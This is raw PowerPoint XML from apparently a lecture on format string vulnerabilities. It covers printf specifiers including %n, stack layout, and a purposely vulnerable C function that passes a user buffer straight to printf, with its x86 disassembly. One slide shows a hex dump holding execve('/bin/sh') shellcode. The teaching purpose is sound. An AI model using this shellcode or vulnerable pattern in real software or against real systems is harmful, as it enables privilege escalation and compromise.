                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bfff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 0101 0101 0101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 0101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 0101 0101 0101 0101 0101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 0101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 0101 3101 50c0 2f68 732f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>6868 622f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>6e69 e389 5350 e189 d231 0bb0 80cd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524002" y="5818823"/>
            <a:ext cx="2113515" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96733"/>
              <a:gd name="adj2" fmla="val -42435"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Superuser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="wifi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26" y="19061"/>
            <a:ext cx="1608834" cy="15411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ight Brace 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3848103" y="-216821"/>
            <a:ext cx="457200" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 78772"/>
            </a:avLst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3112" y="1039265"/>
            <a:ext cx="1600200" cy="5029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mbria"/>
              </a:rPr>
              <a:t>Exploit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4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80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3165" y="2427863"/>
            <a:ext cx="3203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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char s1[] = “hello”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char s2[] = “world”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“%s %s %u”,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       s1, s2, 42); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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59014"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="1461558" cy="4859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3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callee-save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9333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47935" y="4321715"/>
            <a:ext cx="492443" cy="7463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err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Left Brace 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="3200400"/>
            <a:ext cx="286577" cy="301521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>
            <a:off x="533400" y="1371600"/>
            <a:ext cx="286577" cy="18288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47935" y="2000236"/>
            <a:ext cx="492443" cy="70109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caller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rounded Rectangular Callout 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="4114800"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96594"/>
              <a:gd name="adj2" fmla="val -22432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address of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“%s %s %u”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rounded Rectangular Callout 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3124200"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -115573"/>
              <a:gd name="adj2" fmla="val -12483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address of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“hello”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rounded Rectangular Callout 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2209800"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -116417"/>
              <a:gd name="adj2" fmla="val -3677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address of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“world”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rounded Rectangular Callout 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="1371600"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96575"/>
              <a:gd name="adj2" fmla="val 40227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Conversion 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859077"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="229024" y="2253576"/>
          <a:ext cx="4876376" cy="35712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66376"/>
                <a:gridCol w="25908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Specifier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Passed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> as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%d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decimal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%u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unsigned decimal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(unsigned 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%x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hexadecimal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(unsigned </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>int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%s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string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const</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> unsigned char *)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%n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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> bytes written so far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*)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57800" y="2253576"/>
            <a:ext cx="4038600" cy="4223424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0 flag: zero-pad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%08x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zero-padded 8-digit hexadecimal number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Minimum Width</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%3s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/>
              <a:t>pad with up to 3 spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“S:%3s”, “1”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>S:  1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“S:%3s”, “12”);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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>S: 12    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“S:%3s”, “123”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“S:%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>s”, “1234”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>S:1234 </a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Folded Corner 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="3276600"/>
            <a:ext cx="3200400" cy="881539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228600" bIns="137160" rtlCol="0" anchor="t" anchorCtr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man -s 3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printf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3842" y="1371600"/>
            <a:ext cx="581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%[flag][width][.precision][length]specifier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How format strings, and more generally variadic functions, are implemented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How to exploit format string vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Viewing memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwriting 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599" y="473028"/>
            <a:ext cx="5486401" cy="16605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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo(char *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 {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2.    char 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[32];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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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4.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>5.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31034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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>080483d4 &lt;foo&gt;:    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483d4:	push   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80483d5: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,%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80483d7:	sub    $0x28,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; allocate 40 bytes on stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill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80483da</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r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dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x8(%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;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eax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:=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M[ebp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+8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] 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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>addr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of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fmt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/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80483dd: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%eax,0x4(%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  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; M[esp+4]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:=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eax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-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push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as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>arg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 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/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80483e1:	lea    -0x20(%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;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eax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:=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ebp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-32    -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addr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of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buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill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80483e4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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     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; M[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esp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]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:=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eax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   - push as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>arg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 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/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80483e7:	call   80482fc &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483ec:	lea    -0x20(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%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;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eax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:= ebp-32    -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addr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of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf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 again</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/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80483ef:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)      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; M[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esp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] :=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eax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   - push as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/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80483f2:	call   804830c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483f7:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483f8:	ret    </a:t>
            </a:r>
          </a:p>
          <a:p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Diagram @ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf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7935" y="5159221"/>
            <a:ext cx="492443" cy="7463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err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Left Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="4862994"/>
            <a:ext cx="286577" cy="133881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533400" y="1385406"/>
            <a:ext cx="286577" cy="34290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7935" y="2878787"/>
            <a:ext cx="492443" cy="44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foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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20238"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="146155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(32 bytes)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stale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foo’s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9" name="Rounded Rectangular Callout 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3733800"/>
            <a:ext cx="1659020" cy="659131"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85521"/>
              <a:gd name="adj2" fmla="val 3719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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fmt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2895600" y="4490762"/>
            <a:ext cx="1659020" cy="659131"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86650"/>
              <a:gd name="adj2" fmla="val -2742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addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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810000" y="1524000"/>
            <a:ext cx="3687027" cy="16605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1.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> foo(char *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 {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2.    char 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[32];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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);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5.  }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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7945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Stack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7935" y="5159221"/>
            <a:ext cx="492443" cy="7463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err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Left Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="4862994"/>
            <a:ext cx="286577" cy="133881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533400" y="1385406"/>
            <a:ext cx="286577" cy="34290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7935" y="2878787"/>
            <a:ext cx="492443" cy="44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foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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19320"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="146155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(32 bytes)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stale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foo’s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10000" y="3505200"/>
            <a:ext cx="4876800" cy="2457510"/>
            <a:chOff x="3810000" y="3505200"/>
            <a:chExt cx="4876800" cy="2457510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="3505200"/>
